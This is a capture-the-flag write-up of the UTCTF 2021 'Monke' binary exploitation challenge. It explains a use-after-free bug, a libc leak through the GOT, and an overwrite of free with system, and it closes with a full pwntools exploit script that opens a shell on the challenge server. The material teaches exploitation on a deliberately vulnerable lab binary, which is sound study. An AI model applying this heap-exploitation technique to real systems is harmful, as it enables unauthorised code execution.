---
title: "UTCTF Monke Writeup"
date: 2021-03-22T14:44:05+01:00
tags: ["UTCTF", "pwn", "2021", "writeup", "uaf", "ret2libc"]
author: "Avalanche"
showToc: True
description: "Writeup of solution to the Monke binary exploitation challange from UTCTF 2021 ctf."
---
# Monke
Challange description:
> I made a monkey simulator. It kinda goes bananas.

We are given two files:
- [monke](https://github.com/xtla/writeups/blob/master/2021/utctf/Monke/monke)
- [libc-2.27.so](https://github.com/xtla/writeups/blob/master/2021/utctf/Monke/libc-2.27.so)

## Inspecting the binary
I started working on this challange by running some basic commands on this binary in order to get some information.
Firstly, we can see that it is 64bit binary and that NX is turned on.
Then I started playing with the binary to see what exactly it's doing. After that it was time for usage of more sofisticated software - ghidra.

Following part of the code seems very interesting. We can see that when the banana is being eaten there is a call to `free` with address that is stored inside inventory and then the part of inventory that stored this addres is replaced with 0. However this replacement does not happen if `can_eat` variable is equal 0. So if we manage to get this variable to 0 then even after eating the banana there still will be a pointer to some address. And then if the program allocates new memory it may use the same address again. This is called uaf(use after free) vulnerability.
```c
puts("Choose an action [eat|rename]:");
fgets(local_48,0x10,stdin);
sVar5 = strcspn(local_48,"\n");
local_48[sVar5] = '\0';
iVar3 = strcmp(local_48,"eat");
if (iVar3 == 0) {
printf("You eat the %s\n",**(undefined8 **)(inventory + (long)local_38 * 8));
free(**(void ***)(inventory + (long)local_38 * 8));
if (can_eat != 0) {
  *(undefined8 *)(inventory + (long)local_38 * 8) = 0;
}
```
Lets check if the `can_eat` variable can be somehow changed to 0.
```c
puts("Pick a direction to walk [n|s|e|w]");
fgets(local_48,0x10,stdin);
if (local_48[0] != 'n') {
  if (local_48[0] < 'o') {
	if (local_48[0] != 'e') {
LAB_004009d4:
	  printf("You try to walk in the direction %c.\n",(ulong)(uint)(int)local_48[0]);
	  puts("Your body reflects through the 4th dimension, reversing your molecules\' chirality."
		  );
	  puts("You are no longer able to digest foods.\n");
	  can_eat = 0;
	}
  }
  else {
	if ((local_48[0] != 's') && (local_48[0] != 'w')) goto LAB_004009d4;
  }
}
```
In the above code `can_eat` variable is changed to 0 after we walk in a direction that does not exist.


Next I wanted to know what exactly is stored at the address that is being pointed to from inventory. So I took a look at it in gdb.

![Here should be a photo wit a screenshot from gdb.](./gdb_screenshot_inventory.png)

We can see that at the addres that inventory points to is a structure consisting of pointer and name's length. It could be expressed in c with something like that:
```c
struct inventory_item {
	char* name;
	size_t length;
}
```
Then I started playing with uaf bug. I run the binary in gdb collected one banana, went in the wrong direction, ate it, then picked up another banana, and finnaly inspected the memory.
I noticed that interesting thing happend when I set the length of first banana's name to 4 and of the second banana to 8.

![This should be another screenshot from gdb.](./gdb_screenshot_uaf.png)

*0x0000000000603ac0* and *0x0000000000603ae0* are locations of inventory items. Notice that in the struct at *0x0000000000603ac0* the pointer to name is the same as the address of the second struct. 

Why is that? When we eat the first banana, part of the memory, where the name of this item was stored, is freed. Then when we pick up the second banana, it is placed at the same address.

What does that allow us to do? Now when we rename the first banana we will be editing the value under *0x0000000000603ae0* which happens to be *0x0000000000603b00* the address of the second banana name. That allows us to leak memory. If we rename the first banana to some address inside memory and then print inventory, the binary will try to read what is under that pointer and display it as the name of the second banana. That means if we name the first banana with a got address of some function, the binary will leak to us some address from libc.

The other thing we could do is, after leaking libc, rename the second banana. By doing this we will overwrite what is stored under the got address we previously renamed the first banana with.

My teammate suggested using got address of `free`. Why? When some banana is being eaten, `free` function is called with the pointer to the banana's name. So if we go with his suggestion and use the address of `system` to overwrite `free`, and find new banana, and name it `/bin/sh`, then, when this banana will be eaten we will get a shell.

## Exploitation
### Plan of action
1. We find a banana and give it a random name. The important thing is to set the name's length to 4.
2. We walk in the not existing direction gaining ability to exploit uaf.
3. We eat the banana we found.
4. We find another banana and set it's name's length to 8.
5. We rename the first banana with got address of `free`.
6. We rename the second banana with the address of 	`system`.
7. We find third banana and name it `/bin/sh`.
8. We eat the third banana.

### Exploit code
``` python
#!/bin/env python
from pwn import *

#sh = gdb.debug("./monke", "b *0x000000000040088e")
elf = ELF("./monke")
# libc = ELF("/usr/lib/libc-2.33.so")
libc = ELF("./libc-2.27.so")

sh = elf.process()
sh = remote("pwn.utctf.live", 9999)

def skip_menu():
    global sh
    sh.recvuntil("2: inventory\n")
    return bool(sh.recvline(timeout=0.5))

def walk(where="s"):
    global sh
    sh.sendline("0")
    sh.sendlineafter("[n|s|e|w]", where)
    return skip_menu()


def find_banana(name, length):
    global sh
    while not walk():
        pass
    sh.sendline("3")
    sh.sendlineafter("How long would you like the name to be:", str(length))
    sh.sendlineafter("What would you like to name it:", name)
    skip_menu()


def eat(idx, end = False):
    sh.sendline("2")
    sh.recvline()
    while bool(sh.recvline(timeout=0.5)):
        pass
    sh.sendline(str(idx))
    sh.recvline()
    sh.sendline("eat")
    sh.recvline()
    if not end:
        skip_menu()

def rename(idx, name):
    sh.sendline("2")
    sh.recvline()
    while bool(sh.recvline(timeout=0.5)):
        pass
    sh.sendline(str(idx))
    sh.recvline()
    sh.sendline("rename")
    sh.recvline()
    sh.sendline(name)
    skip_menu()


# We need to call skip_menu once at the beginning.
skip_menu()

# We find the first banana and set it's name length to 4
find_banana("a", 4)
# We walk in to direction that doesn't exist.
walk("0")
# We eat the banana we collected.
eat(0)
# We find the first banana and set it's name length to 8
find_banana("b", 8)
# We rename the first banana with the got address of free
rename(0, p64(elf.got["free"]))
sh.sendline("s")
skip_menu()

# We display inventory in order to leak free address
sh.sendline("2")
sh.recvline()
sh.recvline()
free = u64(sh.recvline()[3:].strip().ljust(8, b"\x00"))

# We calculate the base address of libc
libc.address = free - libc.symbols["free"]
log.info(f"libc base leaked @ 0x{libc.address:x}")

# We rename the first banana giving te addres of system as name
sh.sendline("1")
sh.recvline()
sh.sendline("rename")
sh.recvline()
sh.sendline(p64(libc.symbols["system"]))
skip_menu()
sh.sendline("s")
skip_menu()

# We find another banana and name it /bin/sh and then eat it
find_banana("/bin/sh", 10)
eat(2, True)
sh.interactive()
```
